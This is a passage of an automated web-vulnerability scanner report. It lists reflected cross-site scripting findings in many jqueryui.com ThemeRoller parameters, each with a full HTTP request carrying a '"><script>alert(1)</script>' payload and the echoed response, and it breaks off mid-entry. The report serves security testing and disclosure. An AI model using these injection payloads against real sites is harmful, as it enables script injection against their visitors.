ver=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7ab614"><script>alert(1)</script>ca0cfcb45f&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorE
...[SNIP]...

1.99. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5530b"><script>alert(1)</script>d1cd2634cc was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e25530b"><script>alert(1)</script>d1cd2634cc&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e25530b"><script>alert(1)</script>d1cd2634cc&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5
...[SNIP]...

1.100. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4da56"><script>alert(1)</script>936f3c9192a was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec4da56"><script>alert(1)</script>936f3c9192a&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec4da56"><script>alert(1)</script>936f3c9192a&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextur
...[SNIP]...

1.101. http://jqueryui.com/themeroller/ [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6e4"><script>alert(1)</script>0a9d3abb1a4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0ade6e4"><script>alert(1)</script>0a9d3abb1a4&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0ade6e4"><script>alert(1)</script>0a9d3abb1a4&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.102. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f98"><script>alert(1)</script>7af9b46dd90 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7e8f98"><script>alert(1)</script>7af9b46dd90&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
da%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7e8f98"><script>alert(1)</script>7af9b46dd90&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefaul
...[SNIP]...

1.103. http://jqueryui.com/themeroller/ [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4e27"><script>alert(1)</script>99d680e85f8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42ef4e27"><script>alert(1)</script>99d680e85f8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42ef4e27"><script>alert(1)</script>99d680e85f8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.104. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed482"><script>alert(1)</script>135f2cc6947 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7ed482"><script>alert(1)</script>135f2cc6947&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7ed482"><script>alert(1)</script>135f2cc6947&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

1.105. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9f44"><script>alert(1)</script>d3edcd87640 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxd9f44"><script>alert(1)</script>d3edcd87640&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxd9f44"><script>alert(1)</script>d3edcd87640&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bg
...[SNIP]...

1.106. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 329c0"><script>alert(1)</script>3b31ba1242c was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px329c0"><script>alert(1)</script>3b31ba1242c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:27:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px329c0"><script>alert(1)</script>3b31ba1242c" type="text/css" media="all" />
...[SNIP]...

1.107. http://jqueryui.com/themeroller/ [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce384"><script>alert(1)</script>8be2803e357 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009ce384"><script>alert(1)</script>8be2803e357&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009ce384"><script>alert(1)</script>8be2803e357&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTe
...[SNIP]...

1.108. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

